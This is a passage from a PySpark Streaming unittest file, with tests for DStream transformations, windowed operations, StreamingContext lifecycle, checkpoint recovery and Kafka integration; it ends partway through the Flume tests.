if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.context import SparkConf, SparkContext, RDD
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.context import StreamingContext
from pyspark.streaming.kafka import Broker, KafkaUtils, OffsetRange, TopicAndPartition
from pyspark.streaming.flume import FlumeUtils
from pyspark.streaming.mqtt import MQTTUtils
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
class PySparkStreamingTestCase(unittest.TestCase):
    """Base class for streaming tests: one shared SparkContext per test class,
    a fresh StreamingContext per test, and helpers that collect DStream output
    into plain Python lists for assertions."""
    # Seconds to wait for the expected amount of output before giving up.
    timeout = 10
    # Batch duration (in seconds) of the StreamingContext created in setUp().
    duration = .5
    @classmethod
    def setUpClass(cls):
        # One SparkContext per class; parallelism 1 keeps batch output deterministic.
        class_name = cls.__name__
        conf = SparkConf().set("spark.default.parallelism", 1)
        cls.sc = SparkContext(appName=class_name, conf=conf)
        cls.sc.setCheckpointDir("/tmp")
    @classmethod
    def tearDownClass(cls):
        cls.sc.stop()
        # Best effort: also stop any SparkContext still registered on the JVM side.
        try:
            jSparkContextOption = SparkContext._jvm.SparkContext.get()
            if jSparkContextOption.nonEmpty():
                jSparkContextOption.get().stop()
        except:
            pass
    def setUp(self):
        self.ssc = StreamingContext(self.sc, self.duration)
    def tearDown(self):
        if self.ssc is not None:
            self.ssc.stop(False)
        # Best effort: also stop any active JVM-side StreamingContext.
        try:
            jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
            if jStreamingContextOption.nonEmpty():
                jStreamingContextOption.get().stop(False)
        except:
            pass
    def wait_for(self, result, n):
        """Poll until *result* holds at least *n* items or self.timeout expires."""
        start_time = time.time()
        while len(result) < n and time.time() - start_time < self.timeout:
            time.sleep(0.01)
        if len(result) < n:
            print("timeout after", self.timeout)
    def _take(self, dstream, n):
        """Start the context and return the first *n* elements seen on *dstream*."""
        results = []
        def take(_, rdd):
            if rdd and len(results) < n:
                results.extend(rdd.take(n - len(results)))
        dstream.foreachRDD(take)
        self.ssc.start()
        self.wait_for(results, n)
        return results
    def _collect(self, dstream, n, block=True):
        """Collect up to *n* non-empty batches of *dstream* as a list of lists.

        With block=False this only registers the collector and returns the
        (initially empty) result list; the caller starts the context and waits.
        """
        result = []
        def get_output(_, rdd):
            if rdd and len(result) < n:
                r = rdd.collect()
                if r:
                    result.append(r)
        dstream.foreachRDD(get_output)
        if not block:
            return result
        self.ssc.start()
        self.wait_for(result, n)
        return result
    def _test_func(self, input, func, expected, sort=False, input2=None):
        """Feed *input* (and optionally *input2*) through *func* and compare the
        collected batches against *expected*; with sort=True, (key, value)
        pairs in each batch are sorted by key before comparison."""
        # Plain Python batches are parallelized into single-partition RDDs.
        if not isinstance(input[0], RDD):
            input = [self.sc.parallelize(d, 1) for d in input]
        input_stream = self.ssc.queueStream(input)
        if input2 and not isinstance(input2[0], RDD):
            input2 = [self.sc.parallelize(d, 1) for d in input2]
        input_stream2 = self.ssc.queueStream(input2) if input2 is not None else None
        if input2:
            stream = func(input_stream, input_stream2)
        else:
            stream = func(input_stream)
        result = self._collect(stream, len(expected))
        if sort:
            self._sort_result_based_on_key(result)
            self._sort_result_based_on_key(expected)
        self.assertEqual(expected, result)
    def _sort_result_based_on_key(self, outputs):
        # Sort each batch's (key, value) pairs in place for order-insensitive checks.
        for output in outputs:
            output.sort(key=lambda x: x[0])
class BasicOperationTests(PySparkStreamingTestCase):
    """Per-batch DStream transformations, each checked against the equivalent
    computation performed directly on the plain-Python input batches."""
    def test_map(self):
        input = [range(1, 5), range(5, 9), range(9, 13)]
        def func(dstream):
            return dstream.map(str)
        expected = [list(map(str, x)) for x in input]
        self._test_func(input, func, expected)
    def test_flatMap(self):
        input = [range(1, 5), range(5, 9), range(9, 13)]
        def func(dstream):
            return dstream.flatMap(lambda x: (x, x * 2))
        expected = [list(chain.from_iterable((map(lambda y: [y, y * 2], x))))
                    for x in input]
        self._test_func(input, func, expected)
    def test_filter(self):
        input = [range(1, 5), range(5, 9), range(9, 13)]
        def func(dstream):
            return dstream.filter(lambda x: x % 2 == 0)
        expected = [[y for y in x if y % 2 == 0] for x in input]
        self._test_func(input, func, expected)
    def test_count(self):
        input = [range(5), range(10), range(20)]
        def func(dstream):
            return dstream.count()
        expected = [[len(x)] for x in input]
        self._test_func(input, func, expected)
    def test_reduce(self):
        input = [range(1, 5), range(5, 9), range(9, 13)]
        def func(dstream):
            return dstream.reduce(operator.add)
        expected = [[reduce(operator.add, x)] for x in input]
        self._test_func(input, func, expected)
    def test_reduceByKey(self):
        input = [[("a", 1), ("a", 1), ("b", 1), ("b", 1)],
                 [("", 1), ("", 1), ("", 1), ("", 1)],
                 [(1, 1), (1, 1), (2, 1), (2, 1), (3, 1)]]
        def func(dstream):
            return dstream.reduceByKey(operator.add)
        expected = [[("a", 2), ("b", 2)], [("", 4)], [(1, 2), (2, 2), (3, 1)]]
        self._test_func(input, func, expected, sort=True)
    def test_mapValues(self):
        input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
                 [(0, 4), (1, 1), (2, 2), (3, 3)],
                 [(1, 1), (2, 1), (3, 1), (4, 1)]]
        def func(dstream):
            return dstream.mapValues(lambda x: x + 10)
        expected = [[("a", 12), ("b", 12), ("c", 11), ("d", 11)],
                    [(0, 14), (1, 11), (2, 12), (3, 13)],
                    [(1, 11), (2, 11), (3, 11), (4, 11)]]
        self._test_func(input, func, expected, sort=True)
    def test_flatMapValues(self):
        input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
                 [(0, 4), (1, 1), (2, 1), (3, 1)],
                 [(1, 1), (2, 1), (3, 1), (4, 1)]]
        def func(dstream):
            return dstream.flatMapValues(lambda x: (x, x + 10))
        expected = [[("a", 2), ("a", 12), ("b", 2), ("b", 12),
                     ("c", 1), ("c", 11), ("d", 1), ("d", 11)],
                    [(0, 4), (0, 14), (1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11)],
                    [(1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11), (4, 1), (4, 11)]]
        self._test_func(input, func, expected)
    def test_glom(self):
        # Two partitions per RDD, so glom yields two sub-lists per batch.
        input = [range(1, 5), range(5, 9), range(9, 13)]
        rdds = [self.sc.parallelize(r, 2) for r in input]
        def func(dstream):
            return dstream.glom()
        expected = [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]
        self._test_func(rdds, func, expected)
    def test_mapPartitions(self):
        input = [range(1, 5), range(5, 9), range(9, 13)]
        rdds = [self.sc.parallelize(r, 2) for r in input]
        def func(dstream):
            def f(iterator):
                yield sum(iterator)
            return dstream.mapPartitions(f)
        # One partial sum per partition (two partitions per batch).
        expected = [[3, 7], [11, 15], [19, 23]]
        self._test_func(rdds, func, expected)
    def test_countByValue(self):
        # Expected values are the number of distinct elements in each batch.
        input = [list(range(1, 5)) * 2, list(range(5, 7)) + list(range(5, 9)), ["a", "a", "b", ""]]
        def func(dstream):
            return dstream.countByValue()
        expected = [[4], [4], [3]]
        self._test_func(input, func, expected)
    def test_groupByKey(self):
        input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
                 [(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
                 [("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
        def func(dstream):
            return dstream.groupByKey().mapValues(list)
        expected = [[(1, [1]), (2, [1]), (3, [1]), (4, [1])],
                    [(1, [1, 1, 1]), (2, [1, 1]), (3, [1])],
                    [("a", [1, 1]), ("b", [1]), ("", [1, 1, 1])]]
        self._test_func(input, func, expected, sort=True)
    def test_combineByKey(self):
        input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
                 [(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
                 [("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
        def func(dstream):
            def add(a, b):
                return a + str(b)
            return dstream.combineByKey(str, add, add)
        expected = [[(1, "1"), (2, "1"), (3, "1"), (4, "1")],
                    [(1, "111"), (2, "11"), (3, "1")],
                    [("a", "11"), ("b", "1"), ("", "111")]]
        self._test_func(input, func, expected, sort=True)
    def test_repartition(self):
        input = [range(1, 5), range(5, 9)]
        rdds = [self.sc.parallelize(r, 2) for r in input]
        def func(dstream):
            return dstream.repartition(1).glom()
        expected = [[[1, 2, 3, 4]], [[5, 6, 7, 8]]]
        self._test_func(rdds, func, expected)
    def test_union(self):
        input1 = [range(3), range(5), range(6)]
        input2 = [range(3, 6), range(5, 6)]
        def func(d1, d2):
            return d1.union(d2)
        expected = [list(range(6)), list(range(6)), list(range(6))]
        self._test_func(input1, func, expected, input2=input2)
    def test_cogroup(self):
        input = [[(1, 1), (2, 1), (3, 1)],
                 [(1, 1), (1, 1), (1, 1), (2, 1)],
                 [("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1)]]
        input2 = [[(1, 2)],
                  [(4, 1)],
                  [("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 2)]]
        def func(d1, d2):
            return d1.cogroup(d2).mapValues(lambda vs: tuple(map(list, vs)))
        expected = [[(1, ([1], [2])), (2, ([1], [])), (3, ([1], []))],
                    [(1, ([1, 1, 1], [])), (2, ([1], [])), (4, ([], [1]))],
                    [("a", ([1, 1], [1, 1])), ("b", ([1], [1])), ("", ([1, 1], [1, 2]))]]
        self._test_func(input, func, expected, sort=True, input2=input2)
    def test_join(self):
        input = [[('a', 1), ('b', 2)]]
        input2 = [[('b', 3), ('c', 4)]]
        def func(a, b):
            return a.join(b)
        expected = [[('b', (2, 3))]]
        self._test_func(input, func, expected, True, input2)
    def test_left_outer_join(self):
        input = [[('a', 1), ('b', 2)]]
        input2 = [[('b', 3), ('c', 4)]]
        def func(a, b):
            return a.leftOuterJoin(b)
        expected = [[('a', (1, None)), ('b', (2, 3))]]
        self._test_func(input, func, expected, True, input2)
    def test_right_outer_join(self):
        input = [[('a', 1), ('b', 2)]]
        input2 = [[('b', 3), ('c', 4)]]
        def func(a, b):
            return a.rightOuterJoin(b)
        expected = [[('b', (2, 3)), ('c', (None, 4))]]
        self._test_func(input, func, expected, True, input2)
    def test_full_outer_join(self):
        input = [[('a', 1), ('b', 2)]]
        input2 = [[('b', 3), ('c', 4)]]
        def func(a, b):
            return a.fullOuterJoin(b)
        expected = [[('a', (1, None)), ('b', (2, 3)), ('c', (None, 4))]]
        self._test_func(input, func, expected, True, input2)
    def test_update_state_by_key(self):
        # State accumulates every value seen so far for key 'k' across batches.
        def updater(vs, s):
            if not s:
                s = []
            s.extend(vs)
            return s
        input = [[('k', i)] for i in range(5)]
        def func(dstream):
            return dstream.updateStateByKey(updater)
        expected = [[0], [0, 1], [0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
        expected = [[('k', v)] for v in expected]
        self._test_func(input, func, expected)
class WindowFunctionTests(PySparkStreamingTestCase):
    """Windowed DStream operations; window and slide durations are in seconds
    (batch duration is 0.5s from the base class)."""
    # Windowed results take longer to drain than single-batch ones.
    timeout = 15
    def test_window(self):
        input = [range(1), range(2), range(3), range(4), range(5)]
        def func(dstream):
            return dstream.window(1.5, .5).count()
        expected = [[1], [3], [6], [9], [12], [9], [5]]
        self._test_func(input, func, expected)
    def test_count_by_window(self):
        input = [range(1), range(2), range(3), range(4), range(5)]
        def func(dstream):
            return dstream.countByWindow(1.5, .5)
        expected = [[1], [3], [6], [9], [12], [9], [5]]
        self._test_func(input, func, expected)
    def test_count_by_window_large(self):
        input = [range(1), range(2), range(3), range(4), range(5), range(6)]
        def func(dstream):
            return dstream.countByWindow(2.5, .5)
        expected = [[1], [3], [6], [10], [15], [20], [18], [15], [11], [6]]
        self._test_func(input, func, expected)
    def test_count_by_value_and_window(self):
        input = [range(1), range(2), range(3), range(4), range(5), range(6)]
        def func(dstream):
            return dstream.countByValueAndWindow(2.5, .5)
        expected = [[1], [2], [3], [4], [5], [6], [6], [6], [6], [6]]
        self._test_func(input, func, expected)
    def test_group_by_key_and_window(self):
        input = [[('a', i)] for i in range(5)]
        def func(dstream):
            return dstream.groupByKeyAndWindow(1.5, .5).mapValues(list)
        expected = [[('a', [0])], [('a', [0, 1])], [('a', [0, 1, 2])], [('a', [1, 2, 3])],
                    [('a', [2, 3, 4])], [('a', [3, 4])], [('a', [4])]]
        self._test_func(input, func, expected)
    def test_reduce_by_invalid_window(self):
        # Window/slide durations must be multiples of the batch duration.
        input1 = [range(3), range(5), range(1), range(6)]
        d1 = self.ssc.queueStream(input1)
        self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 0.1, 0.1))
        self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 1, 0.1))
class StreamingContextTests(PySparkStreamingTestCase):
    """Lifecycle and input-source tests for StreamingContext itself
    (start/stop, file streams, union, transform, getActive*)."""
    duration = 0.1
    # Flipped by the setupFunc closures below to observe whether they ran.
    setupCalled = False
    def _add_input_stream(self):
        # Register a dummy input stream so the context has something to run.
        inputs = [range(1, x) for x in range(101)]
        stream = self.ssc.queueStream(inputs)
        self._collect(stream, 1, block=False)
    def test_stop_only_streaming_context(self):
        self._add_input_stream()
        self.ssc.start()
        self.ssc.stop(False)
        # The underlying SparkContext must still be usable after ssc.stop(False).
        self.assertEqual(len(self.sc.parallelize(range(5), 5).glom().collect()), 5)
    def test_stop_multiple_times(self):
        self._add_input_stream()
        self.ssc.start()
        self.ssc.stop(False)
        self.ssc.stop(False)
    def test_queue_stream(self):
        input = [list(range(i + 1)) for i in range(3)]
        dstream = self.ssc.queueStream(input)
        result = self._collect(dstream, 3)
        self.assertEqual(input, result)
    def test_text_file_stream(self):
        d = tempfile.mkdtemp()
        self.ssc = StreamingContext(self.sc, self.duration)
        dstream2 = self.ssc.textFileStream(d).map(int)
        result = self._collect(dstream2, 2, block=False)
        self.ssc.start()
        # Files must appear after the stream starts to be picked up.
        for name in ('a', 'b'):
            time.sleep(1)
            with open(os.path.join(d, name), "w") as f:
                f.writelines(["%d\n" % i for i in range(10)])
        self.wait_for(result, 2)
        self.assertEqual([list(range(10)), list(range(10))], result)
    def test_binary_records_stream(self):
        d = tempfile.mkdtemp()
        self.ssc = StreamingContext(self.sc, self.duration)
        dstream = self.ssc.binaryRecordsStream(d, 10).map(
            lambda v: struct.unpack("10b", bytes(v)))
        result = self._collect(dstream, 2, block=False)
        self.ssc.start()
        for name in ('a', 'b'):
            time.sleep(1)
            with open(os.path.join(d, name), "wb") as f:
                f.write(bytearray(range(10)))
        self.wait_for(result, 2)
        self.assertEqual([list(range(10)), list(range(10))], [list(v[0]) for v in result])
    def test_union(self):
        input = [list(range(i + 1)) for i in range(3)]
        dstream = self.ssc.queueStream(input)
        dstream2 = self.ssc.queueStream(input)
        dstream3 = self.ssc.union(dstream, dstream2)
        result = self._collect(dstream3, 3)
        expected = [i * 2 for i in input]
        self.assertEqual(expected, result)
    def test_transform(self):
        dstream1 = self.ssc.queueStream([[1]])
        dstream2 = self.ssc.queueStream([[2]])
        dstream3 = self.ssc.queueStream([[3]])
        def func(rdds):
            rdd1, rdd2, rdd3 = rdds
            return rdd2.union(rdd3).union(rdd1)
        dstream = self.ssc.transform([dstream1, dstream2, dstream3], func)
        self.assertEqual([2, 3, 1], self._take(dstream, 3))
    def test_get_active(self):
        self.assertEqual(StreamingContext.getActive(), None)
        # An active context is visible through getActive() until it is stopped.
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
        self.ssc.stop(False)
        self.assertEqual(StreamingContext.getActive(), None)
        self.ssc = StreamingContext(self.sc, self.duration)
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
        # Stopping only the Java-side context must also clear getActive().
        self.ssc._jssc.stop(False)
        self.assertEqual(StreamingContext.getActive(), None)
    def test_get_active_or_create(self):
        self.ssc = None
        self.assertEqual(StreamingContext.getActive(), None)
        def setupFunc():
            ssc = StreamingContext(self.sc, self.duration)
            ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
            self.setupCalled = True
            return ssc
        # No active context: setupFunc must be invoked.
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
        self.ssc.start()
        # Active context: it is returned as-is without calling setupFunc.
        self.setupCalled = False
        self.assertEqual(StreamingContext.getActiveOrCreate(None, setupFunc), self.ssc)
        self.assertFalse(self.setupCalled)
        self.ssc.stop(False)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
        # A context stopped only on the Java side also counts as inactive.
        self.ssc = StreamingContext(self.sc, self.duration)
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
        self.ssc._jssc.stop(False)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
        self.assertTrue(self.setupCalled)
class CheckpointTests(unittest.TestCase):
    """End-to-end checkpoint/recovery tests for StreamingContext.getOrCreate
    and getActiveOrCreate, driving a file-based word-count pipeline."""
    # Flipped by setup() below so the test can observe whether it ran.
    setupCalled = False
    @staticmethod
    def tearDownClass():
        # Clean up any streaming/Spark contexts left on the JVM side by a test.
        jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
        if jStreamingContextOption.nonEmpty():
            jStreamingContextOption.get().stop()
        jSparkContextOption = SparkContext._jvm.SparkContext.get()
        if jSparkContextOption.nonEmpty():
            jSparkContextOption.get().stop()
    def setUp(self):
        # Initialize so tearDown() is safe even when a test fails before
        # assigning these (otherwise tearDown would raise AttributeError and
        # mask the real failure).
        self.ssc = None
        self.sc = None
        self.cpd = None
    def tearDown(self):
        if self.ssc is not None:
            self.ssc.stop(True)
        if self.sc is not None:
            self.sc.stop()
        if self.cpd is not None:
            shutil.rmtree(self.cpd)
    def test_get_or_create_and_get_active_or_create(self):
        inputd = tempfile.mkdtemp()
        outputd = tempfile.mkdtemp() + "/"
        def updater(vs, s):
            # Running per-key sum; s is None on the first batch for a key.
            return sum(vs, s or 0)
        def setup():
            conf = SparkConf().set("spark.default.parallelism", 1)
            sc = SparkContext(conf=conf)
            ssc = StreamingContext(sc, 0.5)
            dstream = ssc.textFileStream(inputd).map(lambda x: (x, 1))
            wc = dstream.updateStateByKey(updater)
            wc.map(lambda x: "%s,%d" % x).saveAsTextFiles(outputd + "test")
            wc.checkpoint(.5)
            self.setupCalled = True
            return ssc
        # Verify that getOrCreate() calls setup() when no checkpoint exists yet.
        self.cpd = tempfile.mkdtemp("test_streaming_cps")
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        # BUG FIX: the checkpoint directory is brand new, so setup() must have
        # run here (the previous assertFalse was inverted).
        self.assertTrue(self.setupCalled)
        self.ssc.start()
        def check_output(n):
            """Write batch *n* to the input dir and wait until the word-count
            output reflects at least *n* occurrences of each line."""
            while not os.listdir(outputd):
                time.sleep(0.01)
            time.sleep(1)
            with open(os.path.join(inputd, str(n)), 'w') as f:
                f.writelines(["%d\n" % i for i in range(10)])
            while True:
                p = os.path.join(outputd, max(os.listdir(outputd)))
                if '_SUCCESS' not in os.listdir(p):
                    # Not a valid output directory yet; wait and retry.
                    time.sleep(0.01)
                    continue
                ordd = self.ssc.sparkContext.textFile(p).map(lambda line: line.split(","))
                d = ordd.values().map(int).collect()
                if not d:
                    time.sleep(0.01)
                    continue
                self.assertEqual(10, len(d))
                s = set(d)
                self.assertEqual(1, len(s))
                m = s.pop()
                if n > m:
                    continue
                self.assertEqual(n, m)
                break
        check_output(1)
        check_output(2)
        # Verify that getOrCreate() recovers from checkpoint files: setup()
        # must NOT be called again.
        self.ssc.stop(True, True)
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.ssc.start()
        check_output(3)
        # Verify that getOrCreate() reuses an existing SparkContext on recovery.
        self.ssc.stop(True, True)
        time.sleep(1)
        sc = SparkContext(SparkConf())
        self.setupCalled = False
        self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.assertTrue(self.ssc.sparkContext == sc)
        # Verify that getActiveOrCreate() also recovers from checkpoint files.
        self.ssc.stop(True, True)
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.ssc.start()
        check_output(4)
        # Verify that getActiveOrCreate() returns the active context unchanged.
        self.setupCalled = False
        self.assertEqual(StreamingContext.getActiveOrCreate(self.cpd, setup), self.ssc)
        self.assertFalse(self.setupCalled)
        # Verify that getActiveOrCreate() reuses an existing SparkContext.
        self.ssc.stop(True, True)
        time.sleep(1)
        self.sc = SparkContext(SparkConf())
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertFalse(self.setupCalled)
        self.assertTrue(self.ssc.sparkContext == sc)
        # Verify that getActiveOrCreate() calls setup() once the checkpoint
        # directory has been deleted.
        self.ssc.stop(True, True)
        shutil.rmtree(self.cpd)
        time.sleep(1)
        self.setupCalled = False
        self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
        self.assertTrue(self.setupCalled)
        self.ssc.stop(True, True)
class KafkaStreamTests(PySparkStreamingTestCase):
    """Receiver-based and direct Kafka streams, plus KafkaRDD creation, driven
    by the JVM-side KafkaTestUtils embedded broker."""
    timeout = 20
    duration = 1
    def setUp(self):
        super(KafkaStreamTests, self).setUp()
        # The test harness lives in the kafka assembly jar, so it must be
        # loaded through the context classloader rather than a direct _jvm ref.
        kafkaTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader()\
            .loadClass("org.apache.spark.streaming.kafka.KafkaTestUtils")
        self._kafkaTestUtils = kafkaTestUtilsClz.newInstance()
        self._kafkaTestUtils.setup()
    def tearDown(self):
        if self._kafkaTestUtils is not None:
            self._kafkaTestUtils.teardown()
            self._kafkaTestUtils = None
        super(KafkaStreamTests, self).tearDown()
    def _randomTopic(self):
        # Random topic name so reruns do not collide with stale broker state.
        return "topic-%d" % random.randint(0, 10000)
    def _validateStreamResult(self, sendData, stream):
        """Count message values received on *stream* and compare the counts
        with the {value: count} dict that was sent."""
        result = {}
        for i in chain.from_iterable(self._collect(stream.map(lambda x: x[1]),
                                                   sum(sendData.values()))):
            result[i] = result.get(i, 0) + 1
        self.assertEqual(sendData, result)
    def _validateRddResult(self, sendData, rdd):
        """Same as _validateStreamResult, but for a KafkaRDD."""
        result = {}
        for i in rdd.map(lambda x: x[1]).collect():
            result[i] = result.get(i, 0) + 1
        self.assertEqual(sendData, result)
    def test_kafka_stream(self):
        """Test the Python Kafka stream API (receiver-based)."""
        topic = self._randomTopic()
        sendData = {"a": 3, "b": 5, "c": 10}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createStream(self.ssc, self._kafkaTestUtils.zkAddress(),
                                         "test-streaming-consumer", {topic: 1},
                                         {"auto.offset.reset": "smallest"})
        self._validateStreamResult(sendData, stream)
    def test_kafka_direct_stream(self):
        """Test the Python direct (receiver-less) Kafka stream API."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        self._validateStreamResult(sendData, stream)
    # NOTE: the tests below use the Python 2-only builtin `long` for offsets,
    # hence the version guards.
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_from_offset(self):
        """Test the Python direct Kafka stream API with explicit start offsets."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        fromOffsets = {TopicAndPartition(topic, 0): long(0)}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams, fromOffsets)
        self._validateStreamResult(sendData, stream)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd(self):
        """Test creating a KafkaRDD from explicit offset ranges."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
        self._validateRddResult(sendData, rdd)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd_with_leaders(self):
        """Test creating a KafkaRDD with explicit partition leaders."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        address = self._kafkaTestUtils.brokerAddress().split(":")
        leaders = {TopicAndPartition(topic, 0): Broker(address[0], int(address[1]))}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges, leaders)
        self._validateRddResult(sendData, rdd)
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_rdd_get_offsetRanges(self):
        """Test that a KafkaRDD reports the offset ranges it was built from."""
        topic = self._randomTopic()
        sendData = {"a": 3, "b": 4, "c": 5}
        offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
        self.assertEqual(offsetRanges, rdd.offsetRanges())
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_foreach_get_offsetRanges(self):
        """Test reading offset ranges from RDDs inside foreachRDD."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        offsetRanges = []
        def getOffsetRanges(_, rdd):
            for o in rdd.offsetRanges():
                offsetRanges.append(o)
        stream.foreachRDD(getOffsetRanges)
        self.ssc.start()
        self.wait_for(offsetRanges, 1)
        self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
    @unittest.skipIf(sys.version >= "3", "long type not support")
    def test_kafka_direct_stream_transform_get_offsetRanges(self):
        """Test reading offset ranges from RDDs inside transform()."""
        topic = self._randomTopic()
        sendData = {"a": 1, "b": 2, "c": 3}
        kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
                       "auto.offset.reset": "smallest"}
        self._kafkaTestUtils.createTopic(topic)
        self._kafkaTestUtils.sendMessages(topic, sendData)
        stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
        offsetRanges = []
        def transformWithOffsetRanges(rdd):
            for o in rdd.offsetRanges():
                offsetRanges.append(o)
            return rdd
        stream.transform(transformWithOffsetRanges).map(lambda kv: kv[1]).count().pprint()
        self.ssc.start()
        self.wait_for(offsetRanges, 1)
        self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
    def test_topic_and_partition_equality(self):
        # Equality is by (topic, partition); either field differing breaks it.
        topic_and_partition_a = TopicAndPartition("foo", 0)
        topic_and_partition_b = TopicAndPartition("foo", 0)
        topic_and_partition_c = TopicAndPartition("bar", 0)
        topic_and_partition_d = TopicAndPartition("foo", 1)
        self.assertEqual(topic_and_partition_a, topic_and_partition_b)
        self.assertNotEqual(topic_and_partition_a, topic_and_partition_c)
        self.assertNotEqual(topic_and_partition_a, topic_and_partition_d)
class FlumeStreamTests(PySparkStreamingTestCase):
    """Push-based Flume receiver tests driven by the JVM-side FlumeTestUtils."""
    timeout = 20
    duration = 1
    def setUp(self):
        super(FlumeStreamTests, self).setUp()
        # FlumeTestUtils lives in the flume assembly jar; load it through the
        # context classloader.
        utilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
            .loadClass("org.apache.spark.streaming.flume.FlumeTestUtils")
        self._utils = utilsClz.newInstance()
    def tearDown(self):
        if self._utils is not None:
            self._utils.close()
            self._utils = None
        super(FlumeStreamTests, self).tearDown()
    def _startContext(self, n, compressed):
        """Start a Flume stream that captures up to *n* events into the
        returned (shared, mutable) result list."""
        dstream = FlumeUtils.createStream(self.ssc, "localhost", self._utils.getTestPort(),
                                          enableDecompression=compressed)
        result = []
        def get_output(_, rdd):
            for event in rdd.collect():
                if len(result) < n:
                    result.append(event)
        dstream.foreachRDD(get_output)
        self.ssc.start()
        return result
